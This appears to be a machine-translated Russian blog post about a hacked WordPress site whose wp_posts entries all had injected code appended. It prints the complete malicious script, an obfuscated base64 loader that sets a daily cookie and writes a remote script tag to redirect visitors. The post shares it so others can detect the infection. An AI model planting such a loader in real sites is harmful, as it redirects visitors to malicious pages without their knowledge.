несколько дней go клиент позвонил мне и сказал, что его WordPress сайт взломан. На рабочем столе мой Kasperski Block блокирует доступ ко всем сообщениям блога на этом сайте. Мобильный телефон я несколько раз перенаправлял на некоторые подозрительные веб-сайты. Я часами искал HEUR: Trojan.Script.Iframer.
Я установил WordPress несколько раз и ничего. Единственное, что нужно было сделать, - это база данных. Я проверил таблицу wp_posts и увидел, что все сообщения блога недавно были обновлены следующим кодом в конце всех сообщений блога. Если у вас возникла такая же проблема, найдите этот или похожий код в вашей базе данных:
<!--codes_iframe-->
<script type=\"text/javascript\">function getCookie(e){
var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,\"\\\\$1\")+\"=([^;]*)\"));
return U?decodeURIComponent(U[1]):void 0}
var src=\"data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",
now=Math.floor(Date.now()/1e3),cookie=getCookie(\"redirect\");
if(now>=(time=cookie)||void 0===time){
var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=/; expires=\"+date.toGMTString(),document.write(\'<script src=\"\'+src+\'\"><\\/script>\')} </script>
<!--/codes_iframe-->
Я не знаю, как они внедрили код. WP и все 5 плагинов (только необходимые Major Plugins) обновлены.